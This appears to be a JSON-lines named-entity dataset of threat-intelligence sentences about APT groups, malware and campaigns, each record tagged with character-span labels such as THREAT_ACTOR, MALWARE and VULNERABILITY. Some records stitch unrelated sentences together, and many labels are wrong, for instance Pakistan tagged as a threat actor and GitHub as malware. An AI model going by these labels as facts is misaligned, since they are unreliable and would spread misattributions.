{"text": "A backdoor also known as: Trojan.Python.Simplified.b Trojan.Py2Exe.HackSpy.ekhfvk Trojan.DownLoader25.20169 Trojan.Python.Simplified.b Trojan:Win32/Pitroj.A Trj/CI.A Win32.Trojan.Simplified.Dxmm W32/Python_Simplified.B!tr Win32/Trojan.IM.2b4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_007741", "source": "cyner2_train"}}
{"text": "Over the past month, Palo Alto Networks has observed two spam campaigns targeting users residing in Italy.", "spans": {"ORGANIZATION: Palo Alto Networks": [[21, 39]], "THREAT_ACTOR: spam campaigns": [[57, 71]]}, "info": {"id": "cyner2_train_007742", "source": "cyner2_train"}}
{"text": "possibly working independently while sharing information between themselves, are exploiting the Elasticsearch vulnerability primarily to establish widespread DDoS botnet infrastructures.", "spans": {"VULNERABILITY: exploiting the Elasticsearch vulnerability": [[81, 123]], "MALWARE: DDoS botnet": [[158, 169]], "SYSTEM: infrastructures.": [[170, 186]]}, "info": {"id": "cyner2_train_007743", "source": "cyner2_train"}}
{"text": "A cross-platform win32-based Mirai spreader and botnet is in the wild and previously discussed publicly.", "spans": {"SYSTEM: cross-platform win32-based": [[2, 28]], "MALWARE: Mirai spreader": [[29, 43]], "MALWARE: botnet": [[48, 54]]}, "info": {"id": "cyner2_train_007745", "source": "cyner2_train"}}
{"text": "When DualToy began to spread in January 2015, it was only capable of infecting Android devices.", "spans": {"MALWARE: DualToy": [[5, 12]], "SYSTEM: Android devices.": [[79, 95]]}, "info": {"id": "cyner2_train_007746", "source": "cyner2_train"}}
{"text": "This group is well known for a widely publicized attack involving the compromise of Forbes.com, in which the site was used to compromise selected targets via a watering hole to a zero-day Adobe Flash exploit.", "spans": {"THREAT_ACTOR: group": [[5, 10]], "VULNERABILITY: zero-day": [[179, 187]], "MALWARE: Adobe Flash exploit.": [[188, 208]]}, "info": {"id": "cyner2_train_007747", "source": "cyner2_train"}}
{"text": "For example, intended victims frequently have titles of Chief Financial Officer, Head of Finance, Senior Vice President, Director and other high level roles.", "spans": {"ORGANIZATION: Chief Financial Officer, Head of Finance, Senior Vice President, Director": [[56, 129]], "ORGANIZATION: high level roles.": [[140, 157]]}, "info": {"id": "cyner2_train_007748", "source": "cyner2_train"}}
{"text": "Links returned by a Google search, however, are not guaranteed to be safe.", "spans": {"SYSTEM: a Google search,": [[18, 34]]}, "info": {"id": "cyner2_train_007750", "source": "cyner2_train"}}
{"text": "This paper has already stated that we believe the Dukes to be a Russian state-sponsored cyberespionage operation .", "spans": {"THREAT_ACTOR: Dukes": [[50, 55]]}, "info": {"id": "cyberner_stix_train_000000", "source": "cyberner_stix_train"}}
{"text": "This file contains all HTML , CSS and PNG files necessary to create overlays . However , the group behind MuddyWater has been known to target other countries in the Middle East , Europe and the US . Derusbi : File Type :P E32 executable ( DLL ) Intel 80386, for MS Windows . UNC2639 was first identified exploiting multiple zero - day vulnerabilities in Microsoft Exchange in early March 2021 .", "spans": {"THREAT_ACTOR: group": [[93, 98]], "THREAT_ACTOR: MuddyWater": [[106, 116]], "MALWARE: Derusbi": [[199, 206]], "TOOL: DLL": [[239, 242]], "SYSTEM: MS Windows": [[262, 272]], "THREAT_ACTOR: UNC2639": [[275, 282]], "VULNERABILITY: multiple zero - day vulnerabilities": [[315, 350]], "TOOL: Microsoft Exchange": [[354, 372]]}, "info": {"id": "cyberner_stix_train_000001", "source": "cyberner_stix_train"}}
{"text": "The technique PLATINUM uses to inject code via hot patching was first documented by security researchers in 2013.7 Administrator permissions are required for hot patching , and the technique used by PLATINUM does not attempt to evade this requirement through exploitation . Based on Kaspersky Lab 's analysis of NetTraveler 's C&C data , there were a total of 350 victims in 40 countries across including the United States , Canada , United Kingdom , Russia , Chile , Morocco , Greece , Belgium , Austria , Ukraine , Lithuania , Belarus , Australia , Hong Kong , Japan , China , Mongolia , Iran , Turkey , India , Pakistan , South Korea , Thailand , Qatar , Kazakhstan , and Jordan .", "spans": {"THREAT_ACTOR: PLATINUM": [[14, 22], [199, 207]], "ORGANIZATION: Kaspersky Lab": [[283, 296]], "TOOL: C&C": [[327, 330]]}, "info": {"id": "cyberner_stix_train_000002", "source": "cyberner_stix_train"}}
{"text": "The implant can log in to the attackers email inbox , parse emails for commands in a special “ Cmd ” folder and save any payloads to a device from email attachments . Bankshot was first reported by the Department of Homeland Security on December 13 , 2017 , and has only recently resurfaced in newly compiled variants . APT33 : 6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18 S-SHA2 SniffPass . This enables GOGETTER to maintain persistence across reboots .", "spans": {"TOOL: Bankshot": [[167, 175]], "ORGANIZATION: Department of Homeland Security": [[202, 233]], "THREAT_ACTOR: APT33": [[320, 325]], "MALWARE: 6401abe9b6e90411dc48ffc863c40c9d9b073590a8014fe1b0e6c2ecab2f7e18 S-SHA2 SniffPass": [[328, 409]], "TOOL: GOGETTER": [[425, 433]]}, "info": {"id": "cyberner_stix_train_000003", "source": "cyberner_stix_train"}}
{"text": "PROMETHIUM is an activity group that has been active since at least 2012 . The attackers have targeted a large number of organizations globally since early 2017 , with the main focus on the Middle East and North Africa ( MENA ) , especially Palestine .", "spans": {"THREAT_ACTOR: PROMETHIUM": [[0, 10]], "THREAT_ACTOR: activity group": [[17, 31]]}, "info": {"id": "cyberner_stix_train_000004", "source": "cyberner_stix_train"}}
{"text": "We expect it to churn out new variants with even more sophisticated techniques . traditionally targeted the aerospace , energy , government , high-tech , consulting services , and chemicals / manufacturing / mining sectors . TAU modified the original HexRaysDeob to make it work for APT10 ANEL obfuscations . In the case of a traditional ProxyNotShell exploit chain , the attack sequence is done in two steps :", "spans": {"ORGANIZATION: aerospace": [[108, 117]], "ORGANIZATION: energy": [[120, 126]], "ORGANIZATION: government": [[129, 139]], "ORGANIZATION: high-tech": [[142, 151]], "ORGANIZATION: consulting services": [[154, 173]], "ORGANIZATION: chemicals": [[180, 189]], "ORGANIZATION: manufacturing": [[192, 205]], "ORGANIZATION: mining sectors": [[208, 222]], "ORGANIZATION: TAU": [[225, 228]], "TOOL: HexRaysDeob": [[251, 262]], "THREAT_ACTOR: APT10": [[283, 288]], "MALWARE: ANEL": [[289, 293]]}, "info": {"id": "cyberner_stix_train_000005", "source": "cyberner_stix_train"}}
{"text": "It has several protections in place , both in the C2 and the malware 's code . An additional campaign has also been observed targeting Japanese entities . The actor behind the ShadowPad incident has been publicly identified by Microsoft in court documents as BARIUM . Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns ( e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s ) ) .", "spans": {"ORGANIZATION: Microsoft": [[227, 236]], "THREAT_ACTOR: BARIUM": [[259, 265]]}, "info": {"id": "cyberner_stix_train_000006", "source": "cyberner_stix_train"}}
{"text": "This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx” . OurMine is well known : They hijacked WikiLeaks' DNS last month shortly after they took over HBO 's Twitter account ; last year , they took over Mark Zuckerberg 's Twitter and Pinterest accounts ; and they hit both BuzzFeed and TechCrunch not long after that .", "spans": {"MALWARE: document": [[34, 42]], "VULNERABILITY: Trump's_Attack_on_Syria_English.docx”": [[49, 86]], "THREAT_ACTOR: OurMine": [[89, 96]], "ORGANIZATION: WikiLeaks'": [[127, 137]], "ORGANIZATION: Twitter": [[189, 196], [253, 260]], "ORGANIZATION: Mark Zuckerberg": [[234, 249]], "ORGANIZATION: Pinterest": [[265, 274]], "ORGANIZATION: BuzzFeed": [[304, 312]], "ORGANIZATION: TechCrunch": [[317, 327]]}, "info": {"id": "cyberner_stix_train_000007", "source": "cyberner_stix_train"}}
{"text": "Decrypting the assets After being decrypted , the asset turns into the .dex file . RoyalDNS - required APT15 . The image file “order.jpg” contained in the first ZIP structure is actually a non-malicious PNG formatted image . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": {"TOOL: RoyalDNS": [[83, 91]], "THREAT_ACTOR: APT15": [[103, 108]], "VULNERABILITY: vulnerabilities are accessible via the internet": [[265, 312]]}, "info": {"id": "cyberner_stix_train_000008", "source": "cyberner_stix_train"}}
{"text": "The infographic in Figure 1 traces the earliest known dates on which TA505 began distributing particular malware strains , beginning with Dridex in 2014 and most recently when they elevated GlobeImposter and Philadelphia from small , regionally targeted ransomware variants to global threats .", "spans": {"THREAT_ACTOR: TA505": [[69, 74]], "MALWARE: Dridex": [[138, 144]], "MALWARE: GlobeImposter": [[190, 203]], "MALWARE: Philadelphia": [[208, 220]]}, "info": {"id": "cyberner_stix_train_000009", "source": "cyberner_stix_train"}}
{"text": "For more information related to HIDDEN COBRA activity , go to https://www.us-cert.gov/hiddencobra .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[32, 44]], "URL: https://www.us-cert.gov/hiddencobra": [[62, 97]]}, "info": {"id": "cyberner_stix_train_000010", "source": "cyberner_stix_train"}}
{"text": "Dubbed ‘Operation Sheep’ , this massive data stealing campaign is the first known campaign seen in the wild to exploit the Man-in-the-Disk vulnerability revealed by Check Point Research earlier last year . The targets and themes of Bahamut 's campaigns have consistently fallen within two regions – South Asia ( primarily Pakistan , specifically Kashmir ) and the Middle East ( from Morocco to Iran ) .", "spans": {"THREAT_ACTOR: ‘Operation Sheep’": [[7, 24]], "VULNERABILITY: Man-in-the-Disk": [[123, 138]]}, "info": {"id": "cyberner_stix_train_000011", "source": "cyberner_stix_train"}}
{"text": "] net is not awfully well maintained or updated to the latest apps available . Henkel confirms the Winnti incident and issues the following statement: The cyberattack was discovered in the summer of 2014 and Henkel promptly took all necessary precautions . While attribution of the first two spear phishing attacks is still uncertain , we attribute the second December phishing campaign to the China-based APT group that we refer to as APT16 .", "spans": {"ORGANIZATION: Henkel": [[79, 85]], "THREAT_ACTOR: Winnti": [[99, 105]], "THREAT_ACTOR: APT16": [[436, 441]]}, "info": {"id": "cyberner_stix_train_000012", "source": "cyberner_stix_train"}}
{"text": "Donot , named and tracked by PatchSky , is an attack group that mainly targets countries such as Pakistan in South Asia . Early in Q2 , Kaspersky identified an interesting Lazarus attack targeting a mobile gaming company in South Korea that we believe was aimed at stealing application source code . In a recent campaign , Kaspersky observed ScarCruft using a multi-stage binary to infect several victims and ultimately install a final payload known as ROKRAT – a cloud service-based backdoor . ESET recently analyzed a new Mac OS sample from the OceanLotus group that had been uploaded to VirusTotal . The threat actor behind the campaign , which Kaspersky believes to be the PLATINUM APT group , uses an elaborate , previously unseen , steganographic technique to conceal communication . FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope , Leviathan and TEMP.Jumper . In January , Kaspersky identified new activity by the Transparent Tribe APT group aka PROJECTM and MYTHIC LEOPARD , a threat actor with interests aligned with Pakistan that has shown a persistent focus on Indian military targets . OceanLotus was another actor active during this period , using a new downloader called KerrDown , as reported by Palo Alto . ESET recently uncovered a new addition to OceanLotus’s toolset targeting Mac OS . In mid-2018 , Kaspersky's report on Operation AppleJeus” highlighted the focus of the Lazarus threat actor on cryptocurrency exchanges . Kaspersky also observed some activity from Gaza Team and MuddyWater . Kaspersky wrote about LuckyMouse targeting national data centers in June . Kaspersky also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China . Kaspersky have observed similar activity in the past from groups such as Oilrig and Stonedrill , which leads us to believe the new attacks could be connected , though for now that connection is only assessed as low confidence . In August 2019 , FireEye released the Double Dragon” report on our newest graduated threat group , APT41 . Today , FireEye Intelligence is releasing a comprehensive report detailing APT41 , a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations . Group-IB experts continuously monitor the Silence’ activities . Group-IB has uncovered a hacker group , MoneyTaker , attacking banks in the USA and Russia . Group-IB reveals the unknown details of attacks from one of the most notorious APT groups , Lazarus . Finally , Kaspersky produced a summary report on Sofacy’s summertime activity . Kaspersky were also able to produce two reports on Korean speaking actors , specifically involving Scarcruft and Bluenoroff . Analysis of the payload allowed us to confidently link this attack to an actor Kaspersky track as BlackOasis . Kaspersky first became aware of BlackOasis’ activities in May 2016 , while investigating another Adobe Flash zero day .", "spans": {"THREAT_ACTOR: Donot": [[0, 5]], "ORGANIZATION: PatchSky": [[29, 37]], "ORGANIZATION: Kaspersky": [[136, 145], [323, 332], [648, 657], [937, 946], [1499, 1508], [1569, 1578], [1644, 1653], [1825, 1834], [2654, 2663], [2724, 2733], [2929, 2938], [2961, 2970]], "THREAT_ACTOR: Lazarus": [[172, 179], [1448, 1455], [2634, 2641]], "ORGANIZATION: mobile gaming": [[199, 212]], "THREAT_ACTOR: ScarCruft": [[342, 351]], "MALWARE: ROKRAT": [[453, 459]], "ORGANIZATION: ESET": [[495, 499], [1280, 1284]], "FILEPATH: sample": [[531, 537]], "THREAT_ACTOR: OceanLotus": [[547, 557], [1155, 1165]], "THREAT_ACTOR: actor": [[614, 619]], "ORGANIZATION: PLATINUM": [[677, 685]], "ORGANIZATION: FireEye": [[790, 797], [2070, 2077], [2168, 2175]], "ORGANIZATION: APT40": [[806, 811]], "THREAT_ACTOR: TEMP.Periscope": [[879, 893]], "THREAT_ACTOR: Leviathan": [[896, 905]], "THREAT_ACTOR: TEMP.Jumper": [[910, 921]], "THREAT_ACTOR: PROJECTM": [[1010, 1018]], "THREAT_ACTOR: MYTHIC LEOPARD": [[1023, 1037]], "ORGANIZATION: military": [[1136, 1144]], "MALWARE: KerrDown": [[1242, 1250]], "ORGANIZATION: Palo Alto": [[1268, 1277]], "THREAT_ACTOR: OceanLotus’s": [[1322, 1334]], "ORGANIZATION: Kaspersky's": [[1376, 1387]], "THREAT_ACTOR: MuddyWater": [[1556, 1566]], "ORGANIZATION: LuckyMouse": [[1591, 1601], [1675, 1685]], "THREAT_ACTOR: Oilrig": [[1898, 1904]], "THREAT_ACTOR: Stonedrill": [[1909, 1919]], "THREAT_ACTOR: APT41": [[2152, 2157], [2235, 2240]], "ORGANIZATION: financially": [[2350, 2361]], "ORGANIZATION: Group-IB": [[2385, 2393], [2449, 2457], [2542, 2550]], "THREAT_ACTOR: Silence’": [[2427, 2435]], "THREAT_ACTOR: MoneyTaker": [[2489, 2499]], "ORGANIZATION: banks": [[2512, 2517]], "THREAT_ACTOR: Sofacy’s": [[2693, 2701]], "THREAT_ACTOR: Scarcruft": [[2823, 2832]], "THREAT_ACTOR: Bluenoroff": [[2837, 2847]], "THREAT_ACTOR: BlackOasis": [[2948, 2958]], "THREAT_ACTOR: BlackOasis’": [[2993, 3004]], "TOOL: Flash": [[3064, 3069]], "VULNERABILITY: zero day": [[3070, 3078]]}, "info": {"id": "cyberner_stix_train_000013", "source": "cyberner_stix_train"}}
{"text": "Threat Actor Profile : TA505 , From Dridex to GlobeImposter .", "spans": {"THREAT_ACTOR: TA505": [[23, 28]], "MALWARE: Dridex": [[36, 42]], "MALWARE: GlobeImposter": [[46, 59]]}, "info": {"id": "cyberner_stix_train_000014", "source": "cyberner_stix_train"}}
{"text": "November 16 , 2016 In what 's being chalked up as an apparent mistake , more than 120,000 Android phones sold in the U.S. were shipped with spying code that sent text messages , call logs and other sensitive data to a server in Shanghai . This slight delay may point to the handing over of active exploitation duties to other operator(s) in a multi-team APT10 effort within the Ministry of State Security for the attack . The actor embedded malicious code to a resource section of the legitimate SFX file created by a file encryption tool , and modified the entry point of the program for jumping to the malicious code soon after the SFX program starts .", "spans": {"SYSTEM: Android": [[90, 97]], "THREAT_ACTOR: APT10": [[354, 359]]}, "info": {"id": "cyberner_stix_train_000015", "source": "cyberner_stix_train"}}
{"text": "Also , by creating this type of API access , Turla could use one accessible server as a single point to dump data to and exfiltrate data from . Since late 2018 , based upon the most-recent posting , FireEye appears to have \" walked back \" the previously-used terminology of TEMP.Veles and instead refers rather cryptically to the \" TRITON actor \" , while Dragos leveraged identified behaviors to consistently refer to an activity group , XENOTIME .", "spans": {"ORGANIZATION: FireEye": [[199, 206]], "THREAT_ACTOR: TEMP.Veles": [[274, 284]], "MALWARE: TRITON": [[332, 338]], "ORGANIZATION: Dragos": [[355, 361]], "THREAT_ACTOR: XENOTIME": [[438, 446]]}, "info": {"id": "cyberner_stix_train_000016", "source": "cyberner_stix_train"}}
{"text": "] databit [ . In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar . The sample 832f5e01be536da71d5b3f7e41938cfb shares code with an older Aumlib variant with the hash cb3dcde34fd9ff0e19381d99b02f9692 . Based on our telemetry , we have identified an array of affected victims including US - based retailers , local governments , a university , and an engineering firm .", "spans": {"THREAT_ACTOR: Mofang": [[37, 43]], "FILEPATH: 832f5e01be536da71d5b3f7e41938cfb": [[179, 211]], "MALWARE: Aumlib": [[238, 244]], "FILEPATH: cb3dcde34fd9ff0e19381d99b02f9692": [[267, 299]], "ORGANIZATION: US - based retailers": [[385, 405]], "ORGANIZATION: local governments": [[408, 425]], "ORGANIZATION: university": [[430, 440]], "ORGANIZATION: engineering firm": [[450, 466]]}, "info": {"id": "cyberner_stix_train_000017", "source": "cyberner_stix_train"}}
{"text": "It is also possible that this functionality is under development , making this placeholder code incomplete . Cylance determined that the ‘Ghost Dragon’ group utilized specifically tailored variants of Gh0st RAT , which the group modified from the 3.6 version of the source code released in 2008 . The first three are generated by rand() and the fourth is computed based on the first and third .", "spans": {"ORGANIZATION: Cylance": [[109, 116]], "THREAT_ACTOR: ‘Ghost Dragon’": [[137, 151]], "TOOL: Gh0st RAT": [[201, 210]], "TOOL: rand()": [[330, 336]]}, "info": {"id": "cyberner_stix_train_000018", "source": "cyberner_stix_train"}}
{"text": "As the previous picture demonstrated , the followed Vector object ’s length field being overflowed as 0x80007fff , which enables the attacker to read/write arbitrary data within user space .", "spans": {}, "info": {"id": "cyberner_stix_train_000019", "source": "cyberner_stix_train"}}
{"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . During the months that followed in which we tracked Confucius' activities , we found that they were still aiming for Pakistani targets .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: CMD/PowerShell": [[40, 54]], "THREAT_ACTOR: attackers": [[72, 81]]}, "info": {"id": "cyberner_stix_train_000020", "source": "cyberner_stix_train"}}
{"text": "The Hillary Clinton email leak was the center of the latest scandal in the news caused by Threat Group-4127 ( TG-4127 ) .", "spans": {"TOOL: email": [[20, 25]], "THREAT_ACTOR: Threat Group-4127": [[90, 107]], "THREAT_ACTOR: TG-4127": [[110, 117]]}, "info": {"id": "cyberner_stix_train_000021", "source": "cyberner_stix_train"}}
{"text": "The bootkit Android.Oldboot has infected more than 350,000 android users in China , Spain , Italy , Germany , Russia , Brazil , the USA and some Southeast Asian countries . It was a targeted attack we are calling \" Machete \" . In seeking to identify the organization behind this activity ,our research found that People ’s Liberation Army ( PLA ’s ) Unit 61398 is similar to APT1 in its mission , capabilities , and resources . Clients using Internet Explorer version 8 are served with “ about.htm ” , for other versions of the browser and for any other browser capable of running Java applets , the JavaScript code loads “ JavaApplet.html ” .", "spans": {"MALWARE: Android.Oldboot": [[12, 27]], "SYSTEM: android": [[59, 66]], "ORGANIZATION: People ’s Liberation Army": [[313, 338]], "ORGANIZATION: PLA": [[341, 344]], "ORGANIZATION: Unit 61398": [[350, 360]], "THREAT_ACTOR: APT1": [[375, 379]], "SYSTEM: Internet Explorer version 8": [[442, 469]]}, "info": {"id": "cyberner_stix_train_000022", "source": "cyberner_stix_train"}}
{"text": "NOVEMBER 2016 , The OSCE confirmed that it had suffered an intrusion , which a Western intelligence service attributed to APT28 .", "spans": {"ORGANIZATION: OSCE": [[20, 24]], "THREAT_ACTOR: APT28": [[122, 127]]}, "info": {"id": "cyberner_stix_train_000023", "source": "cyberner_stix_train"}}
{"text": "The group Magic Hound is linked via infrastructure and tools to the Rocket Kitten threat actor group although Palo Alto cannot confirm the extent of any relationship between the two groups .", "spans": {"THREAT_ACTOR: Magic Hound": [[10, 21]], "THREAT_ACTOR: Rocket Kitten": [[68, 81]]}, "info": {"id": "cyberner_stix_train_000024", "source": "cyberner_stix_train"}}
{"text": "APT35 typically targets U.S. and the Middle Eastern military , diplomatic and government personnel , organizations in the media , energy and defense industrial base ( DIB ) , and engineering , business services and telecommunications sectors . In wake of these events , a security firm Resecurity reached out to NBC news and claimed that they had reasons to believe that the attacks were carried out by Iranian-linked group known as IRIDIUM .", "spans": {"THREAT_ACTOR: APT35": [[0, 5]], "ORGANIZATION: military": [[52, 60]], "ORGANIZATION: diplomatic": [[63, 73]], "ORGANIZATION: government personnel": [[78, 98]], "ORGANIZATION: organizations": [[101, 114]], "ORGANIZATION: media": [[122, 127]], "ORGANIZATION: energy": [[130, 136]], "ORGANIZATION: defense industrial base": [[141, 164]], "ORGANIZATION: DIB": [[167, 170]], "ORGANIZATION: engineering": [[179, 190]], "ORGANIZATION: business services": [[193, 210]], "ORGANIZATION: telecommunications sectors": [[215, 241]], "ORGANIZATION: security firm": [[272, 285]], "ORGANIZATION: Resecurity": [[286, 296]]}, "info": {"id": "cyberner_stix_train_000025", "source": "cyberner_stix_train"}}
{"text": "It appears that the group values hardcoded into the malware is associated with the targeted organization , as several are Saudi Arabian organizations within the telecommunications and defense industries . From our first malicious sample encounter back in mid-September until now , we have observed 12 infected applications , the majority of which are in the system utility category .", "spans": {"THREAT_ACTOR: group": [[20, 25]], "ORGANIZATION: telecommunications": [[161, 179]], "ORGANIZATION: defense industries": [[184, 202]], "FILEPATH: malicious sample": [[220, 236]]}, "info": {"id": "cyberner_stix_train_000026", "source": "cyberner_stix_train"}}
{"text": "Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . Dokument 09.06.2017.zip .", "spans": {"MALWARE: More_eggs malware": [[31, 48]], "MALWARE: cmd.exe": [[132, 139]], "FILEPATH: Dokument 09.06.2017.zip": [[142, 165]]}, "info": {"id": "cyberner_stix_train_000027", "source": "cyberner_stix_train"}}
{"text": "Cannon acknowledges the receipt of file download by sending an email to sahro.bella7@post.cz with l.txt ( contains 090 string ) as the attachment , ok2 within the body and a subject with the unique system identifier via SMTPS from one of the three accounts from Step 1 .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[63, 68]], "EMAIL: sahro.bella7@post.cz": [[72, 92]], "FILEPATH: l.txt": [[98, 103]]}, "info": {"id": "cyberner_stix_train_000028", "source": "cyberner_stix_train"}}
{"text": "These malware pose as legitimate Facebook or Chrome applications . The targeting of Pakistan , Bangladesh , Sri Lanka , Maldives , Myanmar , Nepal , and the Shanghai Cooperation Organization are all historical espionage targets by India . Generic : aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7 Trojan S-MAL/Downloader ( Executable file ) .", "spans": {"SYSTEM: Facebook": [[33, 41]], "SYSTEM: Chrome": [[45, 51]], "ORGANIZATION: Shanghai Cooperation Organization": [[157, 190]], "THREAT_ACTOR: espionage": [[210, 219]], "MALWARE: Generic": [[239, 246]], "FILEPATH: aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7": [[249, 313]], "TOOL: Trojan S-MAL/Downloader": [[314, 337]]}, "info": {"id": "cyberner_stix_train_000029", "source": "cyberner_stix_train"}}
{"text": "One method , which was popular in Germany , is known as mobile TAN ( mTAN ) . Related or not , one thing is certain : the actor ( s ) using these customized BlackEnergy malware are intent on stealing information from the targets . Since May 2016 , we have continued to monitor and uncover various attacks and tools associated with the OilRig group .", "spans": {"THREAT_ACTOR: actor": [[122, 127]], "TOOL: BlackEnergy malware": [[157, 176]], "THREAT_ACTOR: OilRig group": [[335, 347]]}, "info": {"id": "cyberner_stix_train_000030", "source": "cyberner_stix_train"}}
{"text": "QiAnXin identified this APT group coded as ‘APT-C-35’ in 2017 , who is mainly targeting Pakistan and other South Asian countries for cyber espionage . In total , Scattered Canary received more than 3 , 000 account credentials as a result of their phishing attacks . For over eighteen months from March 2017 until November 2018 , Scattered Canary’s frequent enterprise-focused credential phishing campaigns almost exclusively targeted businesses in the United States and Canada . In July 2018 , following a trend we have observed across the entire BEC threat landscape , Scattered Canary changed their preferred cash out mechanism from wire transfers to gift cards . Instead of using fake Google Docs phishing pages to collect personal email login credentials , Scattered Canary began using phishing pages of commonly used business applications to compromise enterprise credentials . Using personal information obtained from various sources , Scattered Canary started perpetrating fraud against US federal and state government agencies . In total , 35 actors have been tied to Scattered Canary’s operations since the group emerged in 2008 . Just as with romance scams , actors make use of scripts and templates they can copy-and-paste without having to create something on their own . When it comes to engaging targets , Scattered Canary frequently maximized efficiencies through the use of scripts , or as some members of the group call them , formats.” These formats are templated text documents that can contain several layers of phishing messages to send to potential victims . Recently , we unveiled the existence of a UEFI rootkit , called LoJax , which we attribute to the Sednit group . If Scattered Canary can be seen as a microcosm for the rapidly evolving organizations behind today’s most pernicious email scams , this report demonstrates that a much more holistic approach—one based on threat actor identity rather than type of fraudulent activity—is required to detect email fraud and protect organizations . This is a first for an APT group , and shows Sednit has access to very sophisticated tools to conduct its espionage operations . Three years ago , the Sednit group unleashed new components targeting victims in various countries in the Middle East and Central Asia . In the past , Sednit used a similar technique for credential phishing . At the end of August 2018 , the Sednit group launched a spearphishing email campaign where it distributed shortened URLs that delivered the first stage of Zebrocy components . As we explained in our most recent blogpost about Zebrocy , the configuration of the backdoor is stored in in the resource section and is split into four different hex-encoded , encrypted blobs . The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . It used GitHub and Slack as tools for communication between the malware and its controller . On July 9 , we discovered a new version of SLUB delivered via another unique watering hole website . This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro’s Zero Day Initiative ( ZDI ) that was just patched this April .", "spans": {"ORGANIZATION: QiAnXin": [[0, 7]], "THREAT_ACTOR: ‘APT-C-35’": [[43, 53]], "THREAT_ACTOR: Pakistan": [[88, 96]], "THREAT_ACTOR: Scattered Canary": [[162, 178], [570, 586], [761, 777], [942, 958], [1320, 1336], [1697, 1713]], "THREAT_ACTOR: Scattered Canary’s": [[329, 347], [1076, 1094]], "TOOL: email": [[735, 740], [1982, 1987], [2430, 2435]], "ORGANIZATION: state government agencies": [[1009, 1034]], "THREAT_ACTOR: actors": [[1169, 1175]], "MALWARE: scripts": [[1188, 1195]], "MALWARE: templates": [[1200, 1209]], "MALWARE: LoJax": [[1645, 1650]], "THREAT_ACTOR: Sednit": [[1679, 1685], [2067, 2073], [2173, 2179], [2302, 2308]], "MALWARE: sophisticated tools": [[2093, 2112]], "THREAT_ACTOR: Zebrocy": [[2586, 2593]], "MALWARE: backdoor": [[2621, 2629]], "THREAT_ACTOR: SLUB": [[2754, 2758], [2999, 3003]], "VULNERABILITY: CVE-2018-8174": [[2813, 2826]], "THREAT_ACTOR: It": [[2863, 2865]], "MALWARE: GitHub": [[2871, 2877]], "MALWARE: Slack": [[2882, 2887]], "VULNERABILITY: CVE-2019-0752": [[3082, 3095]], "ORGANIZATION: Trend Micro’s Zero Day Initiative": [[3147, 3180]], "ORGANIZATION: ZDI": [[3183, 3186]]}, "info": {"id": "cyberner_stix_train_000031", "source": "cyberner_stix_train"}}
{"text": "At the time of writing , to our knowledge no other third-party app stores , nor the official Google Play store , were or are hosting this malicious HenBox variant masquerading as DroidVPN . Far from attacking Henkel and the other companies arbitrarily , Winnti takes a highly strategic approach . APT16 actors sent spear phishing emails to two Taiwanese media organizations .", "spans": {"SYSTEM: Google Play": [[93, 104]], "MALWARE: HenBox": [[148, 154]], "ORGANIZATION: Henkel": [[209, 215]], "THREAT_ACTOR: Winnti": [[254, 260]], "THREAT_ACTOR: APT16 actors": [[297, 309]], "TOOL: emails": [[330, 336]], "ORGANIZATION: media organizations": [[354, 373]]}, "info": {"id": "cyberner_stix_train_000032", "source": "cyberner_stix_train"}}
{"text": "The oldest app of the second campaign was last updated in April 2016 , meaning that the malicious code hid for a long time on the Play store undetected . Their operations against gaming and technology organizations are believed to be economically motivated in nature . It starts by initializing a random number generator and reading 100 bytes inside the ZxShell Dll at a hardcoded location . Using tools that are more lightweight and generic than those observed in prior OT incidents , the actor likely decreased the time and resources required to conduct a cyber physical attack .", "spans": {"SYSTEM: Play store": [[130, 140]], "ORGANIZATION: gaming": [[179, 185]], "ORGANIZATION: technology organizations": [[190, 214]], "MALWARE: ZxShell": [[354, 361]], "TOOL: Dll": [[362, 365]]}, "info": {"id": "cyberner_stix_train_000033", "source": "cyberner_stix_train"}}
{"text": "Mobile devices are at the frontier of cyber espionage , and other criminal motives . Also our visibility as a vendor does not cover every company in the world ( at least so far ; ) ) and the Kaspersky Security Network ( KSN ) did not reveal other attacks except those against gaming companies . The plugin registry key HKLM\\SYSTEM\\CurrentControlSet\\Control\\zxplug is opened and each value is queried . RA Group , in its ongoing campaigns , has targeted the U.S. , South Korea , Taiwan , the U.K. and India across several business verticals , including manufacturing , wealth management , insurance providers , pharmaceuticals and financial management consulting companies .", "spans": {"ORGANIZATION: Kaspersky Security Network": [[191, 217]], "ORGANIZATION: KSN": [[220, 223]], "ORGANIZATION: gaming companies": [[276, 292]], "THREAT_ACTOR: RA Group": [[402, 410]], "ORGANIZATION: the U.S.": [[453, 461]], "ORGANIZATION: South Korea": [[464, 475]], "ORGANIZATION: Taiwan": [[478, 484]], "ORGANIZATION: U.K.": [[491, 495]], "ORGANIZATION: India": [[500, 505]], "VULNERABILITY: business verticals": [[521, 539]], "VULNERABILITY: manufacturing": [[552, 565]], "VULNERABILITY: wealth management": [[568, 585]], "VULNERABILITY: insurance providers": [[588, 607]], "VULNERABILITY: pharmaceuticals and financial management consulting companies": [[610, 671]]}, "info": {"id": "cyberner_stix_train_000034", "source": "cyberner_stix_train"}}
